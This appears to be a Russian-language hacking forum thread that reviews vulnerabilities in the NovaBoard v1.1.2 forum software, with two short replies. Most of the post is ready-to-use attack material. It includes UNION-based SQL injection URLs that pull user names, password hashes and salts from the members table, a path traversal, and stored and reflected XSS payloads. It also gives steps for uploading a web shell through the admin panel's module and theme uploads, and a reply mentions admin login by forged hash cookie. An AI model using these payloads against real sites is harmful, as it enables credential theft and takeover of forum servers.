![]() |
[Обзор уязвимостей NovaBoard]
Обзор уязвимостей NovaBoard Forum Official site: www.novaboard.net Latest release: NovaBoard v1.1.2 ------------------------------------------------------------------------------ Default table prefix: novaboard_ Table with users: members Columns: Код:
|id|name|usertitle|email|role|password|password_time|pass_salt|theme|board_lang|time_offset|read_all_posts|avatar|remote_avatar|signature|location|nationality|msn|aol|yahoo|skype|xbox|wii|ps3|last_online|warn_level|suspend_date|whiteboard|register_date|verified|user_posts|banned|new_pms|allow_admin_email|moderate|subscribe_pm|never_spam|Код:
// Generate salt...SQL injection #1 Vuln file: /includes/pages/search.php Код:
/*...*/Код:
http://[host]/[path]/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+[prefix]members+where+id=1+--+Vuln file: /includes/forums/addreply.php Код:
if ($_COOKIE['mqpid']!=''){Exploit: Код:
GET http://[host]/[path]/index.php?func=addreply&topic=1 HTTP/1.0Vuln file: /includes/header.php Код:
/*...*/Exploit: Код:
http://[host]/[path]/index.php?page=list&forum=1&topic=xek'+union+select+concat_ws(0x3a,name,password,pass_salt)+from+[prefix]members+where+id=1+--+Код:
<meta name="description" content="{login:hash:salt}" />Vuln file: /includes/structure.php Код:
/*...*/Код:
http://[host]/[path]/index.php?page=../../downloadActive XSS Exploit: Код:
[img]javascript:alert(1)[/img]Passive XSS Exploit: Код:
http://[host]/[path]/index.php?page=search&search=xek&topic=1"><script>alert(1)</script>Exploit: Код:
http://[host]/[path]/index.php/"><script>alert(1)</script>Exploit: Код:
http://[host]/[path]/index.php?topic=1&limit=xЦитата:
Upload shell from Admin CP Пакуем шелл winzip'ом Далее переходим в Admin CP --> Board Settings --> Modules Settings аплодим наш чудо-модуль.. Шелл будет находиться в /modules/[name_shell].php Таким же способом можно залить через Themes Settings шелл будет в папке themes ------------------------------------------------------------------------------ P.S. все найденные уязвимости тестировались на NovaBoard v1.1.2. Есть большая вероятность что эти уязвимости будут работать и на более ранних версиях. |
отлично.
от себя добавлю, вход в админку по хешу. Создаем cookie: Цитата:
|
Вышла версия 1.1.3 SQL-Inj в поиске пофиксили точно!
|
| Время: 05:03 |